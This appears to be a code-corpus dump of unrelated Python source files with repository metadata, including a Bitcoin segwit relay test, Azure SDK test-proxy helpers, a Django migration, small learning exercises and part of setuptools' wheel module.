return (len(self.wtx_node.last_wtxidrelay) > 0)
self.wtx_node.wait_until(received_wtxidrelay)
# Create a Segwit output from the latest UTXO
# and announce it to the network
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
# Create a Segwit transaction
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_pubkey))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx2.rehash()
# Announce Segwit transaction with wtxid
# and wait for getdata
self.wtx_node.announce_tx_and_wait_for_getdata(tx2, use_wtxid=True)
with p2p_lock:
lgd = self.wtx_node.lastgetdata[:]
assert_equal(lgd, [CInv(MSG_WTX, tx2.calc_sha256(True))])
# Announce Segwit transaction from non wtxidrelay peer
# and wait for getdata
self.tx_node.announce_tx_and_wait_for_getdata(tx2, use_wtxid=False)
with p2p_lock:
lgd = self.tx_node.lastgetdata[:]
assert_equal(lgd, [CInv(MSG_TX|MSG_WITNESS_FLAG, tx2.sha256)])
# Send tx2 through; it's an orphan so won't be accepted
with p2p_lock:
self.wtx_node.last_message.pop("getdata", None)
test_transaction_acceptance(self.nodes[0], self.wtx_node, tx2, with_witness=True, accepted=False)
# Expect a request for parent (tx) by txid despite use of WTX peer
self.wtx_node.wait_for_getdata([tx.sha256], 60)
with p2p_lock:
lgd = self.wtx_node.lastgetdata[:]
assert_equal(lgd, [CInv(MSG_WITNESS_TX, tx.sha256)])
# Send tx through
test_transaction_acceptance(self.nodes[0], self.wtx_node, tx, with_witness=False, accepted=True)
# Check tx2 is there now
assert_equal(tx2.hash in self.nodes[0].getrawmempool(), True)
if __name__ == '__main__':
SegWitTest().main()
| [
"[email protected]"
] | |
10a74a89df0e005033f9a0040c90b46da278a520 | e71b6d14fbdbc57c7234ca45a47329d7d02fc6f7 | /flask_api/venv/lib/python3.7/site-packages/vsts/member_entitlement_management/v4_1/models/user_entitlement_operation_reference.py | 0e8a8c4903319844a6245687d671b999ccabee76 | [
"MIT"
] | permissive | u-blavins/secret_sasquatch_society | c36993c738ab29a6a4879bfbeb78a5803f4f2a57 | 0214eadcdfa9b40254e331a6617c50b422212f4c | refs/heads/master | 2020-08-14T00:39:52.948272 | 2020-01-22T13:54:58 | 2020-01-22T13:54:58 | 215,058,646 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,307 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .operation_reference import OperationReference
class UserEntitlementOperationReference(OperationReference):
"""UserEntitlementOperationReference.
:param id: Unique identifier for the operation.
:type id: str
:param plugin_id: Unique identifier for the plugin.
:type plugin_id: str
:param status: The current status of the operation.
:type status: object
:param url: URL to get the full operation object.
:type url: str
:param completed: Operation completed with success or failure.
:type completed: bool
:param have_results_succeeded: True if all operations were successful.
:type have_results_succeeded: bool
:param results: List of results for each operation.
:type results: list of :class:`UserEntitlementOperationResult <member-entitlement-management.v4_1.models.UserEntitlementOperationResult>`
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'plugin_id': {'key': 'pluginId', 'type': 'str'},
'status': {'key': 'status', 'type': 'object'},
'url': {'key': 'url', 'type': 'str'},
'completed': {'key': 'completed', 'type': 'bool'},
'have_results_succeeded': {'key': 'haveResultsSucceeded', 'type': 'bool'},
'results': {'key': 'results', 'type': '[UserEntitlementOperationResult]'}
}
def __init__(self, id=None, plugin_id=None, status=None, url=None, completed=None, have_results_succeeded=None, results=None):
super(UserEntitlementOperationReference, self).__init__(id=id, plugin_id=plugin_id, status=status, url=url)
self.completed = completed
self.have_results_succeeded = have_results_succeeded
self.results = results
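# Construction sketch (hypothetical values, following the attribute map above):
#   op_ref = UserEntitlementOperationReference(id='op-1', status='succeeded',
#                                              completed=True,
#                                              have_results_succeeded=True)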
| [
"[email protected]"
] | |
225b6d5941ba617b3affab3562256f853598178b | c15a28ae62eb94dbf3ed13e2065195e572a9988e | /Cook book/src/9/defining_a_decorator_with_user_adjustable_attributes/example2.py | 36d1bb206aabac56e5e7fba7acecdad70229e638 | [] | no_license | xuyuchends1/python | 10798c92840a1a59d50f5dc5738b2881e65f7865 | 545d950a3d2fee799902658e8133e3692939496b | refs/heads/master | 2021-01-25T07:07:04.812140 | 2020-02-28T09:25:15 | 2020-02-28T09:25:15 | 93,647,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,305 | py | # Alternate formulation using function attributes directly
from functools import wraps
import logging
def logged(level, name=None, message=None):
'''
Add logging to a function. level is the logging
level, name is the logger name, and message is the
log message. If name and message aren't specified,
they default to the function's module and name.
'''
def decorate(func):
logname = name if name else func.__module__
log = logging.getLogger(logname)
logmsg = message if message else func.__name__
@wraps(func)
def wrapper(*args, **kwargs):
wrapper.log.log(wrapper.level, wrapper.logmsg)
return func(*args, **kwargs)
# Attach adjustable attributes
wrapper.level = level
wrapper.logmsg = logmsg
wrapper.log = log
return wrapper
return decorate
# Example use
@logged(logging.DEBUG)
def add(x, y):
return x + y
@logged(logging.CRITICAL, 'example')
def spam():
print('Spam!')
if __name__ == '__main__':
import logging
logging.basicConfig(level=logging.DEBUG)
print(add(2, 3))
# Change the log message
add.logmsg = 'Add called'
print(add(2, 3))
# Change the log level
add.level = logging.WARNING
print(add(2, 3))
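    # Expected log output (sketch; __module__ is '__main__' when run as a script):
    #   DEBUG:__main__:add           <- first call, default message
    #   DEBUG:__main__:Add called    <- after changing add.logmsg
    #   WARNING:__main__:Add called  <- after raising add.level
    # with 5 printed after each call.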
| [
"[email protected]"
] | |
dbd5cecff92cba1fcf35215102752961f33b4718 | ce74ed4ad6834168b81d6ec5e53c80935f247fe1 | /python-wrapper/normalizer.py | 260c4e083f822c223ff64a447d4b415a33455417 | [] | no_license | chenghuige/melt | 6b6984243c71a85ec343cfaa67a66e3d1b48c180 | d2646ffe84eabab464b4bef6b31d218abdbf6ce5 | refs/heads/master | 2021-01-25T16:46:57.567890 | 2017-08-26T04:30:13 | 2017-08-26T04:30:13 | 101,304,210 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,386 | py | import os
import sys
import glob
from pyplusplus import module_builder
root = '/home/users/chenghuige/rsc/'
name = 'normalizer'
#define_symbols = ['GCCXML','PYTHON_WRAPPER','NO_BAIDU_DEP']
define_symbols = ['GCCXML','PYTHON_WRAPPER']
files = [
'./gezi.include.python/common_util.h',
'./gezi.include.python/log_util.h',
'./include.python/Prediction/Normalization/Normalizer.h',
'./include.python/Prediction/Normalization/NormalizerFactory.h',
'./gezi.include.python/Numeric/Vector/Vector.h',
]
paths = [
#'./gezi.include.python/Numeric/Vector/',
#'./include.python/MLCore/',
#'./include.python/Prediction/Instances/',
]
#import gezi
#for path in paths:
# files += [f for f in gezi.get_filepaths(path) if f.endswith('.h')]
include_paths=[
'third-64/glog',
'third-64/gflags',
'third-64/gtest',
'third-64/boost.1.53',
'lib2-64/bsl',
'lib2-64/postag',
'lib2-64/dict',
'lib2-64/libcrf',
'lib2-64/others-ex',
'lib2-64/ullib',
'lib2-64/ccode',
'public/odict/output',
'public/uconv/output',
'public/configure/output',
'app/search/sep/anti-spam/gezi/third/rabit',
]
include_paths_python = [
'app/search/sep/anti-spam/melt/python-wrapper',
]
include_paths_obsolute = [
'app/search/sep/anti-spam/melt/python-wrapper/gezi.include.python',
'lib2-64/wordseg',
'public/comlog-plugin',
'app/search/sep/anti-spam/gezi/third',
]
mb = module_builder.module_builder_t(
gccxml_path = '~/.jumbo/bin/gccxml',
define_symbols = define_symbols,
files = files,
include_paths = [root + f + '/include' for f in include_paths]
+ [root + f + '/include.python' for f in include_paths_python]
+ [root + f for f in include_paths_obsolute]
)
mb.build_code_creator( module_name='lib%s'%name )
mb.code_creator.user_defined_directories.append( os.path.abspath('.') )
mb.write_module( os.path.join( os.path.abspath('./'), '%s_py.cc'%name) )
| [
"chenghuige@fa64baa9-71d1-4fed-97ae-c15534abce97"
] | chenghuige@fa64baa9-71d1-4fed-97ae-c15534abce97 |
f81be5ea05f4ea49f85bd863cbbd7e280fde0fa5 | 98e1716c1c3d071b2fedef0ac029eb410f55762c | /part6-import-webdata/No06-Performing-HTTP-requests-in-Python-using-requests.py | e58c16b5e4fa92f0aab1b600c1952cfbd1c58eaa | [] | no_license | iamashu/Data-Camp-exercise-PythonTrack | 564531bcf1dff119949cbb75e1fd63d89cb2779f | c72a4e806494f0e263ced9594597dc8882c2131c | refs/heads/master | 2020-07-22T00:23:12.024386 | 2019-04-12T09:24:42 | 2019-04-12T09:24:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,423 | py | #Performing HTTP requests in Python using requests
'''
Now that you've got your head and hands around makin
g HTTP requests using the urllib package, you're going to figure out how to do the same using the higher-level requests library. You'll once again be pinging DataCamp servers for their "http://www.datacamp.com/teach/documentation" page.
Note that unlike in the previous exercises using urllib, you don't have to close the connection when using requests!
#Instructions
100 XP
Import the package requests.
Assign the URL of interest to the variable url.
Package the request to the URL, send the request and catch the response with a single function requests.get(), assigning the response to the variable r.
Use the text attribute of the object r to return the HTML of the webpage as a string; store the result in a variable text.
Hit submit to print the HTML of the webpage.
'''
# Code
# Import package
#from urllib.request import Requests Error: not this lib
import requests
# Specify the url: url
url="http://www.datacamp.com/teach/documentation"
# Packages the request, send the request and catch the response: r
r = requests.get(url)  # not Request(url), and the connection doesn't need to be closed
# Extract the response: text
text=r.text
# Print the html
print(text)
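# Follow-up sketch (not part of the original exercise): besides r.text, the
# Response object also exposes status and header metadata.
# status = r.status_code                        # e.g. 200
# content_type = r.headers.get('content-type')  # e.g. 'text/html; charset=utf-8'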
'''result: the format is different from the previous one
<!doctype html>
<html lang="en" data-direction="ltr">
<head>
    ...
    <title>DataCamp Help Center</title>
    ...
</head>
<body>
    ... (several hundred lines of the DataCamp Help Center page markup: header,
    search form, collection cards, footer, and Intercom scripts, trimmed here
    for readability) ...
</body>
</html>
''' | [
"[email protected]"
] | |
071cd8751ab4d3c34048353a7eaa7e15171d75b1 | 44064ed79f173ddca96174913910c1610992b7cb | /Second_Processing_app/temboo/Library/Facebook/Actions/Fitness/Walks/UpdateWalk.py | 493e93d6dc4ff63b1d782b571214053924414cfc | [] | no_license | dattasaurabh82/Final_thesis | 440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5 | 8edaea62f5987db026adfffb6b52b59b119f6375 | refs/heads/master | 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,177 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# UpdateWalk
# Updates an existing walk action.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class UpdateWalk(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the UpdateWalk Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Facebook/Actions/Fitness/Walks/UpdateWalk')
def new_input_set(self):
return UpdateWalkInputSet()
def _make_result_set(self, result, path):
return UpdateWalkResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return UpdateWalkChoreographyExecution(session, exec_id, path)
class UpdateWalkInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the UpdateWalk
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved from the final step of the OAuth process.)
"""
InputSet._set_input(self, 'AccessToken', value)
def set_ActionID(self, value):
"""
Set the value of the ActionID input for this Choreo. ((required, string) The id of the action to update.)
"""
InputSet._set_input(self, 'ActionID', value)
def set_Course(self, value):
"""
Set the value of the Course input for this Choreo. ((optional, string) The URL or ID for an Open Graph object representing the course.)
"""
InputSet._set_input(self, 'Course', value)
def set_EndTime(self, value):
"""
Set the value of the EndTime input for this Choreo. ((optional, date) The time that the user ended the action (e.g. 2013-06-24T18:53:35+0000).)
"""
InputSet._set_input(self, 'EndTime', value)
def set_ExpiresIn(self, value):
"""
Set the value of the ExpiresIn input for this Choreo. ((optional, integer) The amount of time (in milliseconds) from the publish_time that the action will expire.)
"""
InputSet._set_input(self, 'ExpiresIn', value)
def set_Message(self, value):
"""
Set the value of the Message input for this Choreo. ((optional, string) A message attached to this action. Setting this parameter requires enabling of message capabilities.)
"""
InputSet._set_input(self, 'Message', value)
def set_Place(self, value):
"""
Set the value of the Place input for this Choreo. ((optional, string) The URL or ID for an Open Graph object representing the location associated with this action.)
"""
InputSet._set_input(self, 'Place', value)
def set_Tags(self, value):
"""
Set the value of the Tags input for this Choreo. ((optional, string) A comma separated list of other profile IDs that also performed this action.)
"""
InputSet._set_input(self, 'Tags', value)
class UpdateWalkResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the UpdateWalk Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((boolean) The response from Facebook.)
"""
return self._output.get('Response', None)
class UpdateWalkChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return UpdateWalkResultSet(response, path)
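# Usage sketch (hypothetical credentials; assumes the standard Temboo session API):
#   from temboo.core.session import TembooSession
#   session = TembooSession('ACCOUNT', 'APP_KEY_NAME', 'APP_KEY_VALUE')
#   choreo = UpdateWalk(session)
#   inputs = choreo.new_input_set()
#   inputs.set_AccessToken('FACEBOOK_ACCESS_TOKEN')
#   inputs.set_ActionID('ACTION_ID')
#   results = choreo.execute_with_results(inputs)
#   print(results.get_Response())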
| [
"[email protected]"
] | |
0e5c2f08572df65160cf0040294875735675b65c | ce78a21f86faf0b9783b4cbc1df1fc562e80a2d8 | /Public/problem/D1/2070.큰놈,작은놈,같은놈.py | 94f01b7703da6229722d2d9bd4b809bf0e98293d | [] | no_license | jongjunpark/TIL | 18961c6518f78c8e3d80677f39caf32c727c5beb | 28f4d83e28851aac2dee4e77321543f1c811cc83 | refs/heads/master | 2023-03-17T01:45:51.867005 | 2022-10-31T10:44:05 | 2022-10-31T10:44:05 | 245,943,735 | 1 | 0 | null | 2023-03-05T17:15:39 | 2020-03-09T04:28:06 | Python | UTF-8 | Python | false | false | 260 | py | T = int(input())
for t in range(1,T+1):
numbers = list(map(int,input().split()))
if numbers[0] > numbers[1]:
print("#{} >".format(t))
elif numbers[0] == numbers[1]:
print("#{} =".format(t))
else:
print("#{} <".format(t)) | [
"[email protected]"
] | |
bfd1700ad0198fea64886e0f2aa06687748976c6 | 4979df3343d7b99a9a826bd1cb946ae79fac260c | /tests/test_runner.py | 1ecd57ab36aa321d2148d96008b681ff168fcb63 | [
"BSD-3-Clause"
] | permissive | e-calder/enaml | 753ff329fb8a2192bddbe7166581ed530fb270be | 8f02a3c1a80c0a6930508551c7de1d345095173d | refs/heads/master | 2021-07-30T01:18:29.222672 | 2021-07-27T08:51:50 | 2021-07-27T08:51:50 | 206,089,494 | 0 | 0 | NOASSERTION | 2019-09-03T13:52:44 | 2019-09-03T13:52:44 | null | UTF-8 | Python | false | false | 673 | py | import os
import sys
import pytest
from utils import enaml_run
from enaml.application import Application, deferred_call
from enaml.runner import main
@pytest.fixture
def sys_argv():
""" Fixture that saves sys.argv and restores it after the test completes
"""
argv = sys.argv
try:
yield
finally:
sys.argv = argv
def test_runner(enaml_run, sys_argv):
"""Test invoking the runner application.
"""
dir_path = os.path.abspath(os.path.split(os.path.dirname(__file__))[0])
sys.argv = ['enaml-run',
os.path.join(dir_path,
'examples', 'stdlib', 'mapped_view.enaml')]
main()
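    # Shell equivalent of what this test drives (sketch, from the repo root):
    #   enaml-run examples/stdlib/mapped_view.enaml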
| [
"[email protected]"
] | |
2df3f8b7738ac707606738926f6e0f3cb24f0154 | 4fc1d1097ac124d0dcbb9c1e574efec5c38105d8 | /staff/migrations/0001_initial.py | 90b968534d808291b151eba7b45cc526e3b91f5a | [] | no_license | lilianwaweru/management | 077d3261e1f8bd5d6c84a0b40edd28249410279f | e71bd0b67266ca8715605574e52c81137a66eaeb | refs/heads/master | 2020-12-23T14:09:49.630171 | 2020-03-02T12:34:06 | 2020-03-02T12:34:06 | 237,173,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,659 | py | # Generated by Django 3.0.3 on 2020-03-02 11:14
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Work',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(blank=True, upload_to='images/')),
('first_name', models.CharField(max_length=30)),
('other_names', models.CharField(max_length=30)),
('department', models.CharField(max_length=30)),
('employee_number', models.IntegerField()),
('identification_number', models.IntegerField()),
('nssf_number', models.IntegerField()),
('nhif_number', models.IntegerField()),
('date_of_birth', models.DateField()),
('employee_position', models.CharField(max_length=30)),
('secondary_shool', models.CharField(max_length=100)),
('higher_education', models.CharField(max_length=100)),
('level_of_education', models.CharField(max_length=100)),
('course', models.CharField(max_length=100)),
('other_certificates', models.CharField(max_length=100)),
('company', models.CharField(max_length=100)),
('position', models.CharField(max_length=100)),
('duration', models.IntegerField()),
('tasks', models.CharField(max_length=1000)),
],
),
]
| [
"[email protected]"
] | |
e328cc4ddbb881174b91f93521be7d3e5d87ce0a | 15b7a9708d6fb6f9ae5ac55830f996c629468910 | /ch06/Ex6_16.py | 686602d686c015c0a9a4d929a1940e73303da2f7 | [] | no_license | Anancha/Python_Bible | 81dfab4ebe7f74c46615403cbd8a37b714b84df1 | d9569abf2ad60393289fcec22b81340a19e28601 | refs/heads/main | 2023-09-03T00:52:58.249183 | 2021-11-12T07:57:56 | 2021-11-12T07:57:56 | 415,224,243 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 665 | py | shape_tuple1 = ("square","circle","triangle","rectangle","star")
shape_tuple2 = ("heart","oval")
print("shape_tuple1 = ",shape_tuple1)
print("shape_tuple2 = ",shape_tuple2)
length = len(shape_tuple1)
print("shape_tuple1 = ",length)
print("shape_tuple1[0] = ",shape_tuple1[0])
print("shape_tuple1[4] = ",shape_tuple1[4])
print("shape_tuple1[-5] = ",shape_tuple1[-5])
print("shape_tuple1[-1] = ",shape_tuple1[-1])
print("shape_tuple1[0:5] = ",shape_tuple1[0:5])
print("shape_tuple1[:5] = ",shape_tuple1[:5])
print("shape_tuple1[-4:] = ",shape_tuple1[-4:])
shape_tuple = shape_tuple1 + shape_tuple2
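# Expected combined result (sketch): the concatenation above yields
#   ('square', 'circle', 'triangle', 'rectangle', 'star', 'heart', 'oval')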
print("combine tuple1 and tuple2 = ",shape_tuple) | [
"[email protected]"
] | |
9207964a8abeafead8e2e062e1c63f4719aa680e | d7016f69993570a1c55974582cda899ff70907ec | /tools/azure-sdk-tools/devtools_testutils/proxy_testcase.py | 0c0fe3dc403f3642e5552ec84ae5ffe10acbc867 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 10,296 | py | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import logging
import six
import os
from typing import TYPE_CHECKING
import urllib.parse as url_parse
from azure.core.exceptions import HttpResponseError, ResourceNotFoundError
from azure.core.pipeline.policies import ContentDecodePolicy
# the functions we patch
from azure.core.pipeline.transport import RequestsTransport
# the trimming function to clean up incoming arguments to the test function we are wrapping
from azure_devtools.scenario_tests.utilities import trim_kwargs_from_test_function
from .config import PROXY_URL
from .helpers import get_test_id, is_live, is_live_and_not_recording, set_recording_id
from .proxy_startup import discovered_roots
from urllib3 import PoolManager, Retry
from urllib3.exceptions import HTTPError
import json
if TYPE_CHECKING:
from typing import Callable, Dict, Tuple
from azure.core.pipeline.transport import HttpRequest
# To learn about how to migrate SDK tests to the test proxy, please refer to the migration guide at
# https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/test_proxy_migration_guide.md
if os.getenv("REQUESTS_CA_BUNDLE"):
http_client = PoolManager(
retries=Retry(total=3, raise_on_status=False),
cert_reqs="CERT_REQUIRED",
ca_certs=os.getenv("REQUESTS_CA_BUNDLE"),
)
else:
http_client = PoolManager(retries=Retry(total=3, raise_on_status=False))
# defaults
RECORDING_START_URL = "{}/record/start".format(PROXY_URL)
RECORDING_STOP_URL = "{}/record/stop".format(PROXY_URL)
PLAYBACK_START_URL = "{}/playback/start".format(PROXY_URL)
PLAYBACK_STOP_URL = "{}/playback/stop".format(PROXY_URL)
def get_recording_assets(test_id: str) -> str:
"""
Used to retrieve the assets.json given a PYTEST_CURRENT_TEST test id.
"""
for root in discovered_roots:
current_dir = os.path.dirname(test_id)
while current_dir is not None and not (os.path.dirname(current_dir) == current_dir):
possible_assets = os.path.join(current_dir, "assets.json")
possible_root = os.path.join(current_dir, ".git")
# we need to check for assets.json first!
if os.path.exists(os.path.join(root, possible_assets)):
complete_path = os.path.abspath(os.path.join(root, possible_assets))
return os.path.relpath(complete_path, root).replace("\\", "/")
# we need the git check to prevent ascending out of the repo
elif os.path.exists(os.path.join(root, possible_root)):
return None
else:
current_dir = os.path.dirname(current_dir)
return None
def start_record_or_playback(test_id: str) -> "Tuple[str, Dict[str, str]]":
"""Sends a request to begin recording or playing back the provided test.
This returns a tuple, (a, b), where a is the recording ID of the test and b is the `variables` dictionary that maps
test variables to values. If no variable dictionary was stored when the test was recorded, b is an empty dictionary.
"""
variables = {} # this stores a dictionary of test variable values that could have been stored with a recording
json_payload = {"x-recording-file": test_id}
assets_json = get_recording_assets(test_id)
if assets_json:
json_payload["x-recording-assets-file"] = assets_json
encoded_payload = json.dumps(json_payload).encode("utf-8")
if is_live():
result = http_client.request(
method="POST",
url=RECORDING_START_URL,
body=encoded_payload,
)
if result.status != 200:
message = six.ensure_str(result.data)
raise HttpResponseError(message=message)
recording_id = result.headers["x-recording-id"]
else:
result = http_client.request(
method="POST",
url=PLAYBACK_START_URL,
body=encoded_payload,
)
if result.status != 200:
message = six.ensure_str(result.data)
raise HttpResponseError(message=message)
try:
recording_id = result.headers["x-recording-id"]
except KeyError as ex:
six.raise_from(ValueError("No recording file found for {}".format(test_id)), ex)
if result.data:
try:
variables = json.loads(result.data.decode("utf-8"))
except ValueError as ex: # would be a JSONDecodeError on Python 3, which subclasses ValueError
six.raise_from(
ValueError("The response body returned from starting playback did not contain valid JSON"),
ex,
)
# set recording ID in a module-level variable so that sanitizers can access it
set_recording_id(test_id, recording_id)
return (recording_id, variables)
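# Consumption sketch (hypothetical test id): the tuple returned above is paired
# with stop_record_or_playback() at the end of a recorded test, e.g.
#   recording_id, variables = start_record_or_playback(test_id)
#   ... run the test body ...
#   stop_record_or_playback(test_id, recording_id, variables)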
def stop_record_or_playback(test_id: str, recording_id: str, test_variables: "Dict[str, str]") -> None:
try:
if is_live():
http_client.request(
method="POST",
url=RECORDING_STOP_URL,
headers={
"x-recording-file": test_id,
"x-recording-id": recording_id,
"x-recording-save": "true",
"Content-Type": "application/json",
},
# tests don't record successfully unless test_variables is a dictionary
body=json.dumps(test_variables).encode("utf-8") if test_variables else "{}",
)
else:
http_client.request(
method="POST",
url=PLAYBACK_STOP_URL,
headers={"x-recording-id": recording_id},
)
except HTTPError as e:
raise HttpResponseError(
"The test proxy ran into an error while ending the session. Make sure any test variables you record have "
"string values."
) from e
def get_proxy_netloc() -> "Dict[str, str]":
parsed_result = url_parse.urlparse(PROXY_URL)
return {"scheme": parsed_result.scheme, "netloc": parsed_result.netloc}
def transform_request(request: "HttpRequest", recording_id: str) -> None:
"""Redirect the request to the test proxy, and store the original request URI in a header"""
headers = request.headers
parsed_result = url_parse.urlparse(request.url)
updated_target = parsed_result._replace(**get_proxy_netloc()).geturl()
if headers.get("x-recording-upstream-base-uri", None) is None:
headers["x-recording-upstream-base-uri"] = "{}://{}".format(parsed_result.scheme, parsed_result.netloc)
headers["x-recording-id"] = recording_id
headers["x-recording-mode"] = "record" if is_live() else "playback"
request.url = updated_target
def recorded_by_proxy(test_func: "Callable") -> None:
"""Decorator that redirects network requests to target the azure-sdk-tools test proxy. Use with recorded tests.
For more details and usage examples, refer to
https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/test_proxy_migration_guide.md
"""
def record_wrap(*args, **kwargs):
def transform_args(*args, **kwargs):
copied_positional_args = list(args)
request = copied_positional_args[1]
transform_request(request, recording_id)
return tuple(copied_positional_args), kwargs
trimmed_kwargs = {k: v for k, v in kwargs.items()}
trim_kwargs_from_test_function(test_func, trimmed_kwargs)
if is_live_and_not_recording():
return test_func(*args, **trimmed_kwargs)
test_id = get_test_id()
recording_id, variables = start_record_or_playback(test_id)
original_transport_func = RequestsTransport.send
def combined_call(*args, **kwargs):
adjusted_args, adjusted_kwargs = transform_args(*args, **kwargs)
result = original_transport_func(*adjusted_args, **adjusted_kwargs)
# make the x-recording-upstream-base-uri the URL of the request
# this makes the request look like it was made to the original endpoint instead of to the proxy
# without this, things like LROPollers can get broken by polling the wrong endpoint
parsed_result = url_parse.urlparse(result.request.url)
upstream_uri = url_parse.urlparse(result.request.headers["x-recording-upstream-base-uri"])
upstream_uri_dict = {
"scheme": upstream_uri.scheme,
"netloc": upstream_uri.netloc,
}
original_target = parsed_result._replace(**upstream_uri_dict).geturl()
result.request.url = original_target
return result
RequestsTransport.send = combined_call
# call the modified function
# we define test_variables before invoking the test so the variable is defined in case of an exception
test_variables = None
try:
try:
test_variables = test_func(*args, variables=variables, **trimmed_kwargs)
except TypeError:
logger = logging.getLogger()
logger.info(
"This test can't accept variables as input. The test method should accept `**kwargs` and/or a "
"`variables` parameter to make use of recorded test variables."
)
test_variables = test_func(*args, **trimmed_kwargs)
except ResourceNotFoundError as error:
error_body = ContentDecodePolicy.deserialize_from_http_generics(error.response)
message = error_body.get("message") or error_body.get("Message")
error_with_message = ResourceNotFoundError(message=message, response=error.response)
six.raise_from(error_with_message, error)
finally:
RequestsTransport.send = original_transport_func
stop_record_or_playback(test_id, recording_id, test_variables)
return test_variables
return record_wrap
| [
"[email protected]"
] | |
3738260cd7566f69bb08576a36a0616524060ba0 | ed6625148299e759f39359db9f932dd391b8e86f | /personal_env/lib/python3.8/site-packages/setuptools/wheel.py | e17742f100132d61e0cf7083ef2ce3b873a0ef4a | [
"MIT"
] | permissive | jestinmwilson/personal-website | 128c4717b21fa6fff9df8295b1137f32bbe44b55 | 6e47a7f33ed3b1ca5c1d42c89c5380d22992ed74 | refs/heads/main | 2023-08-28T11:31:07.916714 | 2021-10-14T09:41:13 | 2021-10-14T09:41:13 | 414,847,553 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,675 | py | """Wheels support."""
from distutils.util import get_platform
from distutils import log
import email
import itertools
import os
import posixpath
import re
import zipfile
import pkg_resources
import setuptools
from pkg_resources import parse_version
from setuptools.extern.packaging.tags import sys_tags
from setuptools.extern.packaging.utils import canonicalize_name
from setuptools.extern.six import PY3
from setuptools.command.egg_info import write_requirements
__metaclass__ = type
WHEEL_NAME = re.compile(
r"""^(?P<project_name>.+?)-(?P<version>\d.*?)
((-(?P<build>\d.*?))?-(?P<py_version>.+?)-(?P<abi>.+?)-(?P<platform>.+?)
)\.whl$""",
re.VERBOSE).match
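# Illustrative match: "foo-1.0-py3-none-any.whl" parses to project_name="foo",
# version="1.0", build=None, py_version="py3", abi="none", platform="any".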
NAMESPACE_PACKAGE_INIT = '''\
try:
__import__('pkg_resources').declare_namespace(__name__)
except ImportError:
__path__ = __import__('pkgutil').extend_path(__path__, __name__)
'''
def unpack(src_dir, dst_dir):
'''Move everything under `src_dir` to `dst_dir`, and delete the former.'''
for dirpath, dirnames, filenames in os.walk(src_dir):
subdir = os.path.relpath(dirpath, src_dir)
for f in filenames:
src = os.path.join(dirpath, f)
dst = os.path.join(dst_dir, subdir, f)
os.renames(src, dst)
for n, d in reversed(list(enumerate(dirnames))):
src = os.path.join(dirpath, d)
dst = os.path.join(dst_dir, subdir, d)
if not os.path.exists(dst):
# Directory does not exist in destination,
# rename it and prune it from os.walk list.
os.renames(src, dst)
del dirnames[n]
# Cleanup.
for dirpath, dirnames, filenames in os.walk(src_dir, topdown=True):
assert not filenames
os.rmdir(dirpath)
class Wheel:
def __init__(self, filename):
match = WHEEL_NAME(os.path.basename(filename))
if match is None:
raise ValueError('invalid wheel name: %r' % filename)
self.filename = filename
for k, v in match.groupdict().items():
setattr(self, k, v)
def tags(self):
'''List tags (py_version, abi, platform) supported by this wheel.'''
return itertools.product(
self.py_version.split('.'),
self.abi.split('.'),
self.platform.split('.'),
)
def is_compatible(self):
        '''Is the wheel compatible with the current platform?'''
